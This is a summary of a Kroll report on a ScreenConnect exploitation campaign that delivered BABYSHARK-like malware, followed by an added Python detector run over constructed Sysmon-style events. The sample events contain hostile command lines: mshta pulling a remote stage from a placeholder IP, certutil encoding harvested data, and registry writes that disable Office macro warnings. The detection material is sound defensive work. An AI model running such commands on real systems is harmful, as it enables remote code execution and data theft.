TODDLERSHARK: ScreenConnect Vulnerability Exploited to Deploy BABYSHARK Variant

2024-03-05 Kroll

https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark

Kroll observed a campaign that exploited two ConnectWise ScreenConnect vulnerabilities, the authentication bypass CVE-2024-1709 and the path traversal CVE-2024-1708, to deploy malware closely resembling BABYSHARK, a family previously attributed to Kimsuky (tracked by Kroll as KTA082). After gaining hands-on-keyboard access through an exposed ScreenConnect setup wizard, the actor ran mshta.exe to fetch obfuscated VBScript that generated changing second-stage URLs. The malware disabled Office macro warnings for several Word and Excel versions, collected host, user, network, security-software, installed-software and process data, then encoded the results with certutil for exfiltration. Kroll noted overlap with earlier Kimsuky tradecraft, including data hidden in PEM files and BABYSHARK-like functionality. Both vulnerabilities were fixed in ScreenConnect 23.9.8; on-premises servers below that version should be treated as exposed and checked for the post-exploitation activity described here.
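The intrusion chain above maps to three host-level detections: mshta.exe launched by the ScreenConnect client or pointed at a remote URL, Office VBAWarnings registry values set to 1 (all macros enabled, no prompt), and certutil used with -encode to stage collected data. The following is an added example written for this page, not code from Kroll or from the malware; it runs those checks over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The field names, the ScreenConnect parent image path, the event contents and the assumption that the macro warnings were disabled via the VBAWarnings value are all illustrative.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample telemetry (not from the Kroll report). Sysmon-style
# EventID 1 = process creation, EventID 13 = registry value set.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://192.0.2.10/stage?id=1"},
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -encode C:\Users\Public\sysinfo.txt C:\Users\Public\sysinfo.pem"},
    # Benign noise that the rules must not flag.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify cert.cer"},
]

REMOTE_ACCESS_PARENTS = ("screenconnect", "connectwise")  # assumed parent names
URL_RE = re.compile(r"https?://", re.I)
VBA_RE = re.compile(r"\\Office\\(\d+\.\d+)\\(Word|Excel)\\Security\\VBAWarnings$", re.I)
HEX_RE = re.compile(r"0x([0-9a-f]+)", re.I)


@dataclass
class Alert:
    rule: str
    detail: str


def check_mshta(ev):
    """mshta.exe spawned by a remote-access tool or given a remote URL."""
    if ev.get("EventID") != 1 or not ev["Image"].lower().endswith("\\mshta.exe"):
        return None
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    if any(p in parent for p in REMOTE_ACCESS_PARENTS) or URL_RE.search(cmd):
        return Alert("mshta_remote_payload", cmd)
    return None


def check_vba_warnings(ev):
    """Office VBAWarnings set to 1: macros run with no security prompt."""
    if ev.get("EventID") != 13:
        return None
    m = VBA_RE.search(ev.get("TargetObject", ""))
    h = HEX_RE.search(ev.get("Details", ""))
    if not m or not h:
        return None
    value = int(h.group(1), 16)
    if value == 1:
        return Alert("office_macro_warnings_disabled",
                     f"Office {m.group(1)} {m.group(2)} VBAWarnings={value}")
    return None


def check_certutil_encode(ev):
    """certutil -encode used to base64-wrap a file (staging for exfiltration)."""
    if ev.get("EventID") != 1 or not ev["Image"].lower().endswith("\\certutil.exe"):
        return None
    cmd = ev.get("CommandLine", "")
    if re.search(r"\s-encode\b", cmd, re.I):
        return Alert("certutil_encode_staging", cmd)
    return None


CHECKS = (check_mshta, check_vba_warnings, check_certutil_encode)


def scan(events):
    """Run every check over every event and collect the alerts."""
    return [a for ev in events for chk in CHECKS if (a := chk(ev))]


def summarize(alerts):
    """Count alerts per rule, e.g. {'mshta_remote_payload': 1, ...}."""
    return dict(Counter(a.rule for a in alerts))


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
```

The mshta rule keys on either the parent process or a remote URL so that a local .hta opened from Explorer is not flagged; the VBAWarnings rule alerts only on value 1, since 2 through 4 still prompt or block. In a real deployment, add the mshta and certutil alerts to the ScreenConnect server's own access logs for the setup-wizard request that preceded them.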
